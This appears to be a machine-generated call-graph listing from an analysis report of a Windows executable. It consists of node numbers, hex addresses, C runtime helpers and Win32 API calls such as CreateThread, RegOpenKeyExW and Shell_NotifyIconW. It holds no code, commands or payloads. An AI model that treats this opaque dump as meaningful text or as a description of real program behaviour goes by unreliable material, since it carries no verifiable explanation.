105924 905369 105922->105924 105935 910b77 105924->105935 105927 9046e6 __fseek_nolock 58 API calls 105928 905377 105927->105928 105939 910a02 105928->105939 105932->105700 105933->105701 105934->105701 105936 905371 105935->105936 105937 910b84 105935->105937 105936->105927 105937->105936 105938 902d55 _free 58 API calls 105937->105938 105938->105936 105940 910a0e __freefls@4 105939->105940 105941 910a32 105940->105941 105942 910a1b 105940->105942 105965->105921 105966->105920 106006 948db6 106005->106006 106008 948d9f __tzset_nolock _memmove 106005->106008 106007 9055e2 __fread_nolock 74 API calls 106006->106007 106007->106008 106008->105727 106010 90571c std::exception::_Copy_str 58 API calls 106009->106010 106047->104950 106048->104947 106049->104811 106050->104843 106051->104843 106052->104837 106053->104841 106054->104830 106055->104841 106056->104850 106057->104874 106058 907c56 106059 907c62 __freefls@4 106058->106059 106095 909e08 GetStartupInfoW 106059->106095 106061 907c67 106097 908b7c GetProcessHeap 106061->106097 106063 907cbf 106064 907cca 106063->106064 106180 907da6 58 API calls 3 library calls 106063->106180 106098 909ae6 106064->106098 106067 907cd0 106069 907cdb __RTC_Initialize 106067->106069 106181 907da6 58 API calls 3 library calls 106067->106181 106119 90d5d2 106069->106119 106071 907cea 106072 907cf6 GetCommandLineW 106071->106072 106182 907da6 58 API calls 3 library calls 106071->106182 106138 914f23 GetEnvironmentStringsW 106072->106138 106076 907cf5 106076->106072 106078 907d10 106079 907d1b 106078->106079 106183 9030b5 58 API calls 3 library calls 106078->106183 106148 914d58 106079->106148 106082 907d21 106083 907d2c 106082->106083 106184 9030b5 58 API calls 3 library calls 106082->106184 106162 9030ef 106083->106162 106086 907d34 106087 907d3f __wwincmdln 106086->106087 106185 9030b5 58 API calls 3 library calls 106086->106185 106168 8e47d0 106087->106168 106090 907d53 106091 907d62 106090->106091 106186 903358 58 API calls _doexit 106090->106186 106187 9030e0 58 API calls _doexit 106091->106187 106094 907d67 __freefls@4 106096 909e1e 106095->106096 106096->106061 106097->106063 106188 903187 EncodePointer 106098->106188 106100 909aeb 106193 909d3c 106100->106193 106103 909af4 106206 909b5c 61 API calls 2 library calls 106103->106206 106106 909af9 106106->106067 106108 909b11 106200 9087d5 106108->106200 106111 909b53 106209 909b5c 61 API calls 2 library calls 106111->106209 106114 909b32 106114->106111 106116 909b38 106114->106116 106115 909b58 106115->106067 106208 909a33 58 API calls 4 library calls 106116->106208 106118 909b40 GetCurrentThreadId 106118->106067 106120 90d5de __freefls@4 106119->106120 106121 909c0b __lock 58 API calls 106120->106121 106122 90d5e5 106121->106122 106123 9087d5 __calloc_crt 58 API calls 106122->106123 106124 90d5f6 106123->106124 106125 90d661 GetStartupInfoW 106124->106125 106126 90d601 @_EH4_CallFilterFunc@8 __freefls@4 106124->106126 106127 90d7a5 106125->106127 106134 90d676 106125->106134 106126->106071 106128 90d86d 106127->106128 106132 90d7f2 GetStdHandle 106127->106132 106133 90d805 GetFileType 106127->106133 106224 909e2b InitializeCriticalSectionAndSpinCount 106127->106224 106225 90d87d LeaveCriticalSection _doexit 106128->106225 106129 90d6c4 106129->106127 106135 90d6f8 GetFileType 106129->106135 106223 909e2b InitializeCriticalSectionAndSpinCount 106129->106223 106131 9087d5 __calloc_crt 58 API calls 106131->106134 106132->106127 106133->106127 106134->106127 106134->106129 106134->106131 106135->106129 106139 914f34 106138->106139 106140 907d06 106138->106140 106226 90881d 58 API calls 2 library calls 106139->106226 106144 914b1b GetModuleFileNameW 106140->106144 106142 914f5a _memmove 106143 914f70 FreeEnvironmentStringsW 106142->106143 106143->106140 106145 914b4f _wparse_cmdline 106144->106145 106147 914b8f _wparse_cmdline 106145->106147 106227 90881d 58 API calls 2 library calls 106145->106227 106147->106078 106149 914d71 __NMSG_WRITE 106148->106149 106153 914d69 106148->106153 106150 9087d5 __calloc_crt 58 API calls 106149->106150 106158 914d9a __NMSG_WRITE 106150->106158 106151 914df1 106152 902d55 _free 58 API calls 106151->106152 106152->106153 106153->106082 106154 9087d5 __calloc_crt 58 API calls 106154->106158 106155 914e16 106157 902d55 _free 58 API calls 106155->106157 106157->106153 106158->106151 106158->106153 106158->106154 106158->106155 106159 914e2d 106158->106159 106228 914607 58 API calls 2 library calls 106158->106228 106229 908dc6 IsProcessorFeaturePresent 106159->106229 106163 9030fb __IsNonwritableInCurrentImage 106162->106163 106244 90a4d1 106163->106244 106165 903119 __initterm_e 106166 902d40 __cinit 67 API calls 106165->106166 106167 903138 _doexit __IsNonwritableInCurrentImage 106165->106167 106166->106167 106167->106086 106169 8e47ea 106168->106169 106179 8e4889 106168->106179 106170 8e4824 IsThemeActive 106169->106170 106247 90336c 106170->106247 106174 8e4850 106259 8e48fd SystemParametersInfoW SystemParametersInfoW 106174->106259 106176 8e485c 106260 8e3b3a 106176->106260 106178 8e4864 SystemParametersInfoW 106178->106179 106179->106090 106180->106064 106181->106069 106182->106076 106186->106091 106187->106094 106189 903198 __init_pointers __initp_misc_winsig 106188->106189 106210 90a524 EncodePointer 106189->106210 106191 9031b0 __init_pointers 106192 909e99 34 API calls 106191->106192 106192->106100 106194 909d48 106193->106194 106196 909af0 106194->106196 106211 909e2b InitializeCriticalSectionAndSpinCount 106194->106211 106196->106103 106197 909d8a 106196->106197 106198 909da1 TlsAlloc 106197->106198 106199 909b06 106197->106199 106199->106103 106199->106108 106201 9087dc 106200->106201 106203 908817 106201->106203 106205 9087fa 106201->106205 106212 9151f6 106201->106212 106203->106111 106207 909de6 TlsSetValue 106203->106207 106205->106201 106205->106203 106220 90a132 Sleep 106205->106220 106206->106106 106207->106114 106208->106118 106209->106115 106210->106191 106211->106194 106213 915201 106212->106213 106217 91521c 106212->106217 106214 91520d 106213->106214 106213->106217 106221 908b28 58 API calls __getptd_noexit 106214->106221 106215 91522c RtlAllocateHeap 106215->106217 106218 915212 106215->106218 106217->106215 106217->106218 106222 9033a1 DecodePointer 106217->106222 106218->106201 106220->106205 106221->106218 106222->106217 106223->106129 106224->106127 106225->106126 106226->106142 106227->106147 106228->106158 106230 908dd1 106229->106230 106235 908c59 106230->106235 106234 908dec 106234->106082 106236 908c73 _memset __call_reportfault 106235->106236 106237 908c93 IsDebuggerPresent 106236->106237 106243 90a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106237->106243 106239 90c5f6 __NMSG_WRITE 6 API calls 106241 908d7a 106239->106241 106240 908d57 __call_reportfault 106240->106239 106242 90a140 GetCurrentProcess TerminateProcess 106241->106242 106242->106234 106243->106240 106245 90a4d4 EncodePointer 106244->106245 106245->106245 106246 90a4ee 106245->106246 106246->106165 106248 909c0b __lock 58 API calls 106247->106248 106249 903377 DecodePointer EncodePointer 106248->106249 106312 909d75 LeaveCriticalSection 106249->106312 106251 8e4849 106252 9033d4 106251->106252 106253 9033f8 106252->106253 106254 9033de 106252->106254 106253->106174 106254->106253 106313 908b28 58 API calls __getptd_noexit 106254->106313 106256 9033e8 106314 908db6 9 API calls __wctomb_s_l 106256->106314 106258 9033f3 106258->106174 106259->106176 106261 8e3b47 __write_nolock 106260->106261 106262 8e7667 59 API calls 106261->106262 106263 8e3b51 GetCurrentDirectoryW 106262->106263 106315 8e3766 106263->106315 106265 8e3b7a IsDebuggerPresent 106266 91d272 MessageBoxA 106265->106266 106267 8e3b88 106265->106267 106270 91d28c 106266->106270 106268 8e3c61 106267->106268 106267->106270 106271 8e3ba5 106267->106271 106269 8e3c68 SetCurrentDirectoryW 106268->106269 106272 8e3c75 Mailbox 106269->106272 106448 8e7213 59 API calls Mailbox 106270->106448 106396 8e7285 106271->106396 106272->106178 106275 91d29c 106280 91d2b2 SetCurrentDirectoryW 106275->106280 106280->106272 106312->106251 106313->106256 106314->106258 106316 8e7667 59 API calls 106315->106316 106317 8e377c 106316->106317 106450 8e3d31 106317->106450 106319 8e379a 106320 8e4706 61 API calls 106319->106320 106321 8e37ae 106320->106321 106322 8e7de1 59 API calls 106321->106322 106323 8e37bb 106322->106323 106324 8e4ddd 136 API calls 106323->106324 106325 8e37d4 106324->106325 106326 91d173 106325->106326 106327 8e37dc Mailbox 106325->106327 106503 94955b 106326->106503 106331 8e8047 59 API calls 106327->106331 106330 91d192 106333 902d55 _free 58 API calls 106330->106333 106334 8e37ef 106331->106334 106332 8e4e4a 84 API calls 106332->106330 106335 91d19f 106333->106335 106464 8e928a 106334->106464 106337 8e4e4a 84 API calls 106335->106337 106339 91d1a8 106337->106339 106343 8e3ed0 59 API calls 106339->106343 106340 8e7de1 59 API calls 106341 8e3808 106340->106341 106342 8e84c0 69 API calls 106341->106342 106344 8e381a Mailbox 106342->106344 106345 91d1c3 106343->106345 106346 8e7de1 59 API calls 106344->106346 106347 8e3ed0 59 API calls 106345->106347 106348 8e3840 106346->106348 106349 91d1df 106347->106349 106350 8e84c0 69 API calls 106348->106350 106351 8e4706 61 API calls 106349->106351 106353 8e384f Mailbox 106350->106353 106352 91d204 106351->106352 106354 8e3ed0 59 API calls 106352->106354 106356 8e7667 59 API calls 106353->106356 106355 91d210 106354->106355 106357 8e8047 59 API calls 106355->106357 106358 8e386d 106356->106358 106359 91d21e 106357->106359 106467 8e3ed0 106358->106467 106361 8e3ed0 59 API calls 106359->106361 106363 91d22d 106361->106363 106369 8e8047 59 API calls 106363->106369 106365 8e3887 106365->106339 106366 8e3891 106365->106366 106367 902efd _W_store_winword 60 API calls 106366->106367 106368 8e389c 106367->106368 106368->106345 106370 8e38a6 106368->106370 106371 91d24f 106369->106371 106372 902efd _W_store_winword 60 API calls 106370->106372 106373 8e3ed0 59 API calls 106371->106373 106374 8e38b1 106372->106374 106375 91d25c 106373->106375 106374->106349 106376 8e38bb 106374->106376 106375->106375 106377 902efd _W_store_winword 60 API calls 106376->106377 106378 8e38c6 106377->106378 106378->106363 106379 8e3907 106378->106379 106381 8e3ed0 59 API calls 106378->106381 106379->106363 106380 8e3914 106379->106380 106483 8e92ce 106380->106483 106383 8e38ea 106381->106383 106385 8e8047 59 API calls 106383->106385 106387 8e38f8 106385->106387 106389 8e3ed0 59 API calls 106387->106389 106389->106379 106391 8e928a 59 API calls 106393 8e394f 106391->106393 106392 8e8ee0 60 API calls 106392->106393 106393->106391 106393->106392 106394 8e3ed0 59 API calls 106393->106394 106395 8e3995 Mailbox 106393->106395 106394->106393 106395->106265 106397 8e7292 __write_nolock 106396->106397 106398 91ea22 _memset 106397->106398 106399 8e72ab 106397->106399 106401 91ea3e GetOpenFileNameW 106398->106401 106400 8e4750 60 API calls 106399->106400 106402 8e72b4 106400->106402 106404 91ea8d 106401->106404 106551 900791 106402->106551 106406 8e7bcc 59 API calls 106404->106406 106408 91eaa2 106406->106408 106408->106408 106409 8e72c9 106569 8e686a 106409->106569 106448->106275 106451 8e3d3e __write_nolock 106450->106451 106452 8e7bcc 59 API calls 106451->106452 106457 8e3ea4 Mailbox 106451->106457 106454 8e3d70 106452->106454 106453 8e79f2 59 API calls 106453->106454 106454->106453 106463 8e3da6 Mailbox 106454->106463 106455 8e79f2 59 API calls 106455->106463 106456 8e3e77 106456->106457 106458 8e7de1 59 API calls 106456->106458 106457->106319 106460 8e3e98 106458->106460 106459 8e7de1 59 API calls 106459->106463 106461 8e3f74 59 API calls 106460->106461 106461->106457 106462 8e3f74 59 API calls 106462->106463 106463->106455 106463->106456 106463->106457 106463->106459 106463->106462 106465 900db6 Mailbox 59 API calls 106464->106465 106466 8e37fb 106465->106466 106466->106340 106468 8e3eda 106467->106468 106469 8e3ef3 106467->106469 106470 8e8047 59 API calls 106468->106470 106471 8e7bcc 59 API calls 106469->106471 106472 8e3879 106470->106472 106471->106472 106473 902efd 106472->106473 106474 902f09 106473->106474 106475 902f7e 106473->106475 106482 902f2e 106474->106482 106538 908b28 58 API calls __getptd_noexit 106474->106538 106540 902f90 60 API calls 4 library calls 106475->106540 106478 902f8b 106478->106365 106479 902f15 106539 908db6 9 API calls __wctomb_s_l 106479->106539 106481 902f20 106481->106365 106482->106365 106484 8e92d6 106483->106484 106485 900db6 Mailbox 59 API calls 106484->106485 106486 8e92e4 106485->106486 106488 8e3924 106486->106488 106541 8e91fc 59 API calls Mailbox 106486->106541 106489 8e9050 106488->106489 106542 8e9160 106489->106542 106491 900db6 Mailbox 59 API calls 106492 8e3932 106491->106492 106494 8e8ee0 106492->106494 106493 8e905f 106493->106491 106493->106492 106495 91f17c 106494->106495 106497 8e8ef7 106494->106497 106495->106497 106550 8e8bdb 59 API calls Mailbox 106495->106550 106498 8e8ff8 106497->106498 106499 8e9040 106497->106499 106502 8e8fff 106497->106502 106501 900db6 Mailbox 59 API calls 106498->106501 106500 8e9d3c 60 API calls 106499->106500 106500->106502 106501->106502 106502->106393 106504 8e4ee5 85 API calls 106503->106504 106505 9495ca 106504->106505 106506 949734 96 API calls 106505->106506 106507 9495dc 106506->106507 106508 8e4f0b 74 API calls 106507->106508 106536 91d186 106507->106536 106509 9495f7 106508->106509 106510 8e4f0b 74 API calls 106509->106510 106511 949607 106510->106511 106512 8e4f0b 74 API calls 106511->106512 106513 949622 106512->106513 106514 8e4f0b 74 API calls 106513->106514 106515 94963d 106514->106515 106516 8e4ee5 85 API calls 106515->106516 106517 949654 106516->106517 106518 90571c std::exception::_Copy_str 58 API calls 106517->106518 106519 94965b 106518->106519 106520 90571c std::exception::_Copy_str 58 API calls 106519->106520 106521 949665 106520->106521 106522 8e4f0b 74 API calls 106521->106522 106523 949679 106522->106523 106524 949109 GetSystemTimeAsFileTime 106523->106524 106525 94968c 106524->106525 106526 9496b6 106525->106526 106527 9496a1 106525->106527 106529 9496bc 106526->106529 106530 94971b 106526->106530 106528 902d55 _free 58 API calls 106527->106528 106531 9496a7 106528->106531 106532 948b06 116 API calls 106529->106532 106533 902d55 _free 58 API calls 106530->106533 106534 902d55 _free 58 API calls 106531->106534 106535 949713 106532->106535 106533->106536 106534->106536 106537 902d55 _free 58 API calls 106535->106537 106536->106330 106536->106332 106537->106536 106538->106479 106539->106481 106540->106478 106541->106488 106543 8e9169 Mailbox 106542->106543 106544 91f19f 106543->106544 106549 8e9173 106543->106549 106545 900db6 Mailbox 59 API calls 106544->106545 106547 91f1ab 106545->106547 106546 8e917a 106546->106493 106548 8e9c90 Mailbox 59 API calls 106548->106549 106549->106546 106549->106548 106550->106497 106552 911940 __write_nolock 106551->106552 106553 90079e GetLongPathNameW 106552->106553 106554 8e7bcc 59 API calls 106553->106554 106555 8e72bd 106554->106555 106556 8e700b 106555->106556 106557 8e7667 59 API calls 106556->106557 106558 8e701d 106557->106558 106559 8e4750 60 API calls 106558->106559 106560 8e7028 106559->106560 106561 91e885 106560->106561 106562 8e7033 106560->106562 106566 91e89f 106561->106566 106609 8e7908 61 API calls 106561->106609 106564 8e3f74 59 API calls 106562->106564 106565 8e703f 106564->106565 106603 8e34c2 106565->106603 106568 8e7052 Mailbox 106568->106409 106570 8e4ddd 136 API calls 106569->106570 106571 8e688f 106570->106571 106572 91e031 106571->106572 106573 8e4ddd 136 API calls 106571->106573 106574 94955b 122 API calls 106572->106574 106575 8e68a3 106573->106575 106576 91e046 106574->106576 106575->106572 106577 8e68ab 106575->106577 106578 91e067 106576->106578 106579 91e04a 106576->106579 106581 91e052 106577->106581 106582 8e68b7 106577->106582 106580 900db6 Mailbox 59 API calls 106578->106580 106583 8e4e4a 84 API calls 106579->106583 106594 91e0ac Mailbox 106580->106594 106708 9442f8 90 API calls _wprintf 106581->106708 106610 8e6a8c 106582->106610 106583->106581 106587 91e060 106587->106578 106588 91e260 106589 902d55 _free 58 API calls 106588->106589 106590 91e268 106589->106590 106591 8e4e4a 84 API calls 106590->106591 106597 91e271 106591->106597 106592 8e750f 59 API calls 106592->106594 106594->106588 106594->106592 106594->106597 106600 8e7de1 59 API calls 106594->106600 106702 8e735d 106594->106702 106709 93f73d 59 API calls 2 library calls 106594->106709 106710 93f65e 61 API calls 2 library calls 106594->106710 106711 94737f 59 API calls Mailbox 106594->106711 106596 902d55 _free 58 API calls 106596->106597 106597->106596 106598 8e4e4a 84 API calls 106597->106598 106712 93f7a1 89 API calls 4 library calls 106597->106712 106598->106597 106600->106594 106604 8e34d4 106603->106604 106608 8e34f3 _memmove 106603->106608 106606 900db6 Mailbox 59 API calls 106604->106606 106605 900db6 Mailbox 59 API calls 106607 8e350a 106605->106607 106606->106608 106607->106568 106608->106605 106609->106561 106611 8e6ab5 106610->106611 106612 91e41e 106610->106612 106718 8e57a6 60 API calls Mailbox 106611->106718 106734 93f7a1 89 API calls 4 library calls 106612->106734 106615 8e6ad7 106719 8e57f6 67 API calls 106615->106719 106616 91e431 106735 93f7a1 89 API calls 4 library calls 106616->106735 106618 8e6aec 106618->106616 106619 8e6af4 106618->106619 106621 8e7667 59 API calls 106619->106621 106623 8e6b00 106621->106623 106622 91e44d 106625 8e6b61 106622->106625 106720 900957 60 API calls __write_nolock 106623->106720 106627 8e6b6f 106625->106627 106628 91e460 106625->106628 106626 8e6b0c 106630 8e7667 59 API calls 106626->106630 106629 8e7667 59 API calls 106627->106629 106631 8e5c6f CloseHandle 106628->106631 106633 8e6b78 106629->106633 106634 8e6b18 106630->106634 106632 91e46c 106631->106632 106635 8e4ddd 136 API calls 106632->106635 106636 8e7667 59 API calls 106633->106636 106637 8e4750 60 API calls 106634->106637 106638 91e488 106635->106638 106639 8e6b81 106636->106639 106640 8e6b26 106637->106640 106641 91e4b1 106638->106641 106644 94955b 122 API calls 106638->106644 106642 8e459b 59 API calls 106639->106642 106721 8e5850 ReadFile SetFilePointerEx 106640->106721 106736 93f7a1 89 API calls 4 library calls 106641->106736 106645 8e6b98 106642->106645 106648 91e4a4 106644->106648 106649 8e7b2e 59 API calls 106645->106649 106647 8e6b52 106722 8e5aee SetFilePointerEx SetFilePointerEx 106647->106722 106651 91e4cd 106648->106651 106652 91e4ac 106648->106652 106653 8e6ba9 SetCurrentDirectoryW 106649->106653 106655 8e4e4a 84 API calls 106651->106655 106654 8e4e4a 84 API calls 106652->106654 106659 8e6bbc Mailbox 106653->106659 106654->106641 106657 91e4d2 106655->106657 106656 8e6d0c Mailbox 106713 8e57d4 106656->106713 106658 900db6 Mailbox 59 API calls 106657->106658 106665 91e506 106658->106665 106661 900db6 Mailbox 59 API calls 106659->106661 106663 8e6bcf 106661->106663 106662 8e3bbb 106662->106268 106664 8e522e 59 API calls 106663->106664 106689 8e6bda Mailbox __NMSG_WRITE 106664->106689 106666 8e750f 59 API calls 106665->106666 106697 91e54f Mailbox 106666->106697 106667 8e6ce7 106670 91e740 106678 91e7d9 106683 8e750f 59 API calls 106683->106697 106685 91e7d1 106687 8e7de1 59 API calls 106687->106689 106689->106667 106689->106678 106689->106685 106689->106687 106723 8e586d 67 API calls _wcscpy 106689->106723 106724 8e6f5d GetStringTypeW 106689->106724 106725 8e6ecc 60 API calls __wcsnicmp 106689->106725 106726 8e6faa GetStringTypeW __NMSG_WRITE 106689->106726 106727 90363d GetStringTypeW _iswctype 106689->106727 106728 8e68dc 165 API calls 3 library calls 106689->106728 106729 8e7213 59 API calls Mailbox 106689->106729 106692 8e7de1 59 API calls 106692->106697 106695 91e792 106697->106670 106697->106683 106697->106692 106697->106695 106737 93f73d 59 API calls 2 library calls 106697->106737 106738 93f65e 61 API calls 2 library calls 106697->106738 106739 94737f 59 API calls Mailbox 106697->106739 106740 8e7213 59 API calls Mailbox 106697->106740 106701 91e4c8 106701->106656 106703 8e7370 106702->106703 106706 8e741e 106702->106706 106704 900db6 Mailbox 59 API calls 106703->106704 106705 8e73a2 106703->106705 106704->106705 106705->106706 106707 900db6 59 API calls Mailbox 106705->106707 106706->106594 106707->106705 106708->106587 106709->106594 106710->106594 106711->106594 106712->106597 106714 8e5c6f CloseHandle 106713->106714 106715 8e57dc Mailbox 106714->106715 106716 8e5c6f CloseHandle 106715->106716 106717 8e57eb 106716->106717 106717->106662 106718->106615 106719->106618 106720->106626 106721->106647 106722->106625 106723->106689 106724->106689 106725->106689 106726->106689 106727->106689 106728->106689 106729->106689 106734->106616 106735->106622 106736->106701 106737->106697 106738->106697 106739->106697 106740->106697 106789 8e1016 106794 8e4974 106789->106794 106792 902d40 __cinit 67 API calls 106793 8e1025 106792->106793 106795 900db6 Mailbox 59 API calls 106794->106795 106796 8e497c 106795->106796 106797 8e101b 106796->106797 106801 8e4936 106796->106801 106797->106792 106802 8e493f 106801->106802 106804 8e4951 106801->106804 106803 902d40 __cinit 67 API calls 106802->106803 106803->106804 106805 8e49a0 106804->106805 106806 8e7667 59 API calls 106805->106806 106807 8e49b8 GetVersionExW 106806->106807 106808 8e7bcc 59 API calls 106807->106808 106809 8e49fb 106808->106809 106810 8e7d2c 59 API calls 106809->106810 106813 8e4a28 106809->106813 106811 8e4a1c 106810->106811 106812 8e7726 59 API calls 106811->106812 106812->106813 106814 8e4a93 GetCurrentProcess IsWow64Process 106813->106814 106816 91d864 106813->106816 106815 8e4aac 106814->106815 106817 8e4b2b GetSystemInfo 106815->106817 106818 8e4ac2 106815->106818 106819 8e4af8 106817->106819 106829 8e4b37 106818->106829 106819->106797 106822 8e4b1f GetSystemInfo 106824 8e4ae9 106822->106824 106823 8e4ad4 106825 8e4b37 2 API calls 106823->106825 106824->106819 106827 8e4aef FreeLibrary 106824->106827 106826 8e4adc GetNativeSystemInfo 106825->106826 106826->106824 106827->106819 106830 8e4ad0 106829->106830 106831 8e4b40 LoadLibraryA 106829->106831 106830->106822 106830->106823 106831->106830 106832 8e4b51 GetProcAddress 106831->106832 106832->106830 106833 8e1066 106838 8ef76f 106833->106838 106835 8e106c 106836 902d40 __cinit 67 API calls 106835->106836 106837 8e1076 106836->106837 106839 8ef790 106838->106839 106871 8fff03 106839->106871 106843 8ef7d7 106844 8e7667 59 API calls 106843->106844 106845 8ef7e1 106844->106845 106846 8e7667 59 API calls 106845->106846 106847 8ef7eb 106846->106847 106848 8e7667 59 API calls 106847->106848 106849 8ef7f5 106848->106849 106850 8e7667 59 API calls 106849->106850 106851 8ef833 106850->106851 106852 8e7667 59 API calls 106851->106852 106853 8ef8fe 106852->106853 106881 8f5f87 106853->106881 106857 8ef930 106858 8e7667 59 API calls 106857->106858 106859 8ef93a 106858->106859 106909 8ffd9e 106859->106909 106861 8ef981 106862 8ef991 GetStdHandle 106861->106862 106863 8ef9dd 106862->106863 106864 9245ab 106862->106864 106865 8ef9e5 OleInitialize 106863->106865 106864->106863 106866 9245b4 106864->106866 106865->106835 106916 946b38 64 API calls Mailbox 106866->106916 106868 9245bb 106917 947207 CreateThread 106868->106917 106870 9245c7 CloseHandle 106870->106865 106918 8fffdc 106871->106918 106874 8fffdc 59 API calls 106875 8fff45 106874->106875 106876 8e7667 59 API calls 106875->106876 106877 8fff51 106876->106877 106878 8e7bcc 59 API calls 106877->106878 106879 8ef796 106878->106879 106880 900162 6 API calls 106879->106880 106880->106843 106882 8e7667 59 API calls 106881->106882 106883 8f5f97 106882->106883 106884 8e7667 59 API calls 106883->106884 106885 8f5f9f 106884->106885 106925 8f5a9d 106885->106925 106888 8f5a9d 59 API calls 106889 8f5faf 106888->106889 106890 8e7667 59 API calls 106889->106890 106891 8f5fba 106890->106891 106892 900db6 Mailbox 59 API calls 106891->106892 106893 8ef908 106892->106893 106894 8f60f9 106893->106894 106895 8f6107 106894->106895 106896 8e7667 59 API calls 106895->106896 106897 8f6112 106896->106897 106898 8e7667 59 API calls 106897->106898 106899 8f611d 106898->106899 106900 8e7667 59 API calls 106899->106900 106901 8f6128 106900->106901 106902 8e7667 59 API calls 106901->106902 106903 8f6133 106902->106903 106904 8f5a9d 59 API calls 106903->106904 106905 8f613e 106904->106905 106906 900db6 Mailbox 59 API calls 106905->106906 106907 8f6145 RegisterWindowMessageW 106906->106907 106907->106857 106910 8ffdae 106909->106910 106911 93576f 106909->106911 106912 900db6 Mailbox 59 API calls 106910->106912 106928 949ae7 60 API calls 106911->106928 106914 8ffdb6 106912->106914 106914->106861 106915 93577a 106916->106868 106917->106870 106929 9471ed 65 API calls 106917->106929 106919 8e7667 59 API calls 106918->106919 106920 8fffe7 106919->106920 106921 8e7667 59 API calls 106920->106921 106922 8fffef 106921->106922 106923 8e7667 59 API calls 106922->106923 106924 8fff3b 106923->106924 106924->106874 106926 8e7667 59 API calls 106925->106926 106927 8f5aa5 106926->106927 106927->106888 106928->106915 106930 8e1055 106935 8e2649 106930->106935 106933 902d40 __cinit 67 API calls 106934 8e1064 106933->106934 106936 8e7667 59 API calls 106935->106936 106937 8e26b7 106936->106937 106942 8e3582 106937->106942 106940 8e2754 106941 8e105a 106940->106941 106945 8e3416 59 API calls 2 library calls 106940->106945 106941->106933 106946 8e35b0 106942->106946 106945->106940 106947 8e35a1 106946->106947 106948 8e35bd 106946->106948 106947->106940 106948->106947 106949 8e35c4 RegOpenKeyExW 106948->106949 106949->106947 106950 8e35de RegQueryValueExW 106949->106950 106951 8e35ff 106950->106951 106952 8e3614 RegCloseKey 106950->106952 106951->106952 106952->106947 106953 8e3633 106954 8e366a 106953->106954 106955 8e3688 106954->106955 106956 8e36e7 106954->106956 106993 8e36e5 106954->106993 106957 8e374b PostQuitMessage 106955->106957 106958 8e3695 106955->106958 106960 8e36ed 106956->106960 106961 91d0cc 106956->106961 106994 8e36d8 106957->106994 106965 91d154 106958->106965 106966 8e36a0 106958->106966 106959 8e36ca DefWindowProcW 106959->106994 106962 8e3715 SetTimer RegisterWindowMessageW 106960->106962 106963 8e36f2 106960->106963 107008 8f1070 10 API calls Mailbox 106961->107008 106970 8e373e CreatePopupMenu 106962->106970 106962->106994 106967 8e36f9 KillTimer 106963->106967 106968 91d06f 106963->106968 107013 942527 71 API calls _memset 106965->107013 106971 8e36a8 106966->106971 106972 8e3755 106966->106972 107005 8e443a Shell_NotifyIconW _memset 106967->107005 106980 91d074 106968->106980 106981 91d0a8 MoveWindow 106968->106981 106969 91d0f3 107009 8f1093 331 API calls Mailbox 106969->107009 106970->106994 106976 91d139 106971->106976 106977 8e36b3 106971->106977 106998 8e44a0 106972->106998 106976->106959 107012 937c36 59 API calls Mailbox 106976->107012 106983 91d124 106977->106983 106989 8e36be 106977->106989 106978 91d166 106978->106959 106978->106994 106984 91d097 SetFocus 106980->106984 106985 91d078 106980->106985 106981->106994 106982 8e370c 107006 8e3114 DeleteObject DestroyWindow Mailbox 106982->107006 107011 942d36 81 API calls _memset 106983->107011 106984->106994 106985->106989 106990 91d081 106985->106990 106989->106959 107010 8e443a Shell_NotifyIconW _memset 106989->107010 107007 8f1070 10 API calls Mailbox 106990->107007 106992 91d134 106992->106994 106993->106959 106996 91d118 106997 8e434a 68 API calls 106996->106997 106997->106993 106999 8e4539 106998->106999 107000 8e44b7 _memset 106998->107000 106999->106994 107001 8e407c 61 API calls 107000->107001 107003 8e44de 107001->107003 107002 8e4522 KillTimer SetTimer 107002->106999 107003->107002 107004 91d4ab Shell_NotifyIconW 107003->107004 107004->107002 107005->106982 107006->106994 107007->106994 107008->106969 107009->106989 107010->106996 107011->106992 107012->106993 107013->106978 107014 91fdfc 107037 8eab30 Mailbox _memmove 107014->107037 107017 8e9c90 Mailbox 59 API calls 107017->107037 107018 8eb525 107078 949e4a 89 API calls 4 library calls 107018->107078 107021 920055 107077 949e4a 89 API calls 4 library calls 107021->107077 107023 8eb475 107031 8e8047 59 API calls 107023->107031 107025 8ea55a 107081 949e4a 89 API calls 4 library calls 107025->107081 107027 900db6 59 API calls Mailbox 107038 8e9f37 Mailbox 107027->107038 107028 920064 107029 8eb47a 107029->107021 107044 9209e5 107029->107044 107036 8ea057 107031->107036 107033 8e8047 59 API calls 107033->107038 107035 8e7667 59 API calls 107035->107038 107037->107017 107037->107018 107037->107036 107037->107038 107041 8e7de1 59 API calls 107037->107041 107047 8eb2b6 107037->107047 107049 8e9ea0 331 API calls 107037->107049 107050 92086a 107037->107050 107052 920878 107037->107052 107054 92085c 107037->107054 107055 8eb21c 107037->107055 107057 900db6 59 API calls Mailbox 107037->107057 107060 936e8f 59 API calls 107037->107060 107063 95df37 107037->107063 107066 95df23 107037->107066 107072 95c193 85 API calls 2 library calls 107037->107072 107073 95c2e0 96 API calls Mailbox 107037->107073 107074 947956 59 API calls Mailbox 107037->107074 107075 95bc6b 331 API calls Mailbox 107037->107075 107076 93617e 59 API calls Mailbox 107037->107076 107038->107021 107038->107023 107038->107025 107038->107027 107038->107029 107038->107033 107038->107035 107038->107036 107039 936e8f 59 API calls 107038->107039 107040 902d40 67 API calls __cinit 107038->107040 107042 9209d6 107038->107042 107069 8ec8c0 331 API calls 2 library calls 107038->107069 107070 8eb900 60 API calls Mailbox 107038->107070 107039->107038 107040->107038 107041->107037 107082 949e4a 89 API calls 4 library calls 107042->107082 107083 949e4a 89 API calls 4 library calls 107044->107083 107071 8ef6a3 331 API calls 107047->107071 107049->107037 107051 8e9c90 Mailbox 59 API calls 107050->107051 107051->107054 107080 949e4a 89 API calls 4 library calls 107052->107080 107054->107036 107079 93617e 59 API calls Mailbox 107054->107079 107056 8e9d3c 60 API calls 107055->107056 107058 8eb22d 107056->107058 107057->107037 107059 8e9d3c 60 API calls 107058->107059 107059->107047 107060->107037 107084 95cadd 107063->107084 107065 95df47 107065->107037 107067 95cadd 130 API calls 107066->107067 107068 95df33 107067->107068 107068->107037 107069->107038 107070->107038 107071->107018 107072->107037 107073->107037 107074->107037 107075->107037 107076->107037 107077->107028 107078->107054 107079->107036 107080->107054 107081->107036 107082->107044 107083->107036 107085 8e9837 84 API calls 107084->107085 107086 95cb1a 107085->107086 107090 95cb61 Mailbox 107086->107090 107122 95d7a5 107086->107122 107088 95cf2e 107160 95d8c8 92 API calls Mailbox 107088->107160 107090->107065 107092 95cf3d 107094 95cdc7 107092->107094 107095 95cf49 107092->107095 107093 95cbb2 Mailbox 107093->107090 107096 8e9837 84 API calls 107093->107096 107109 95cdb9 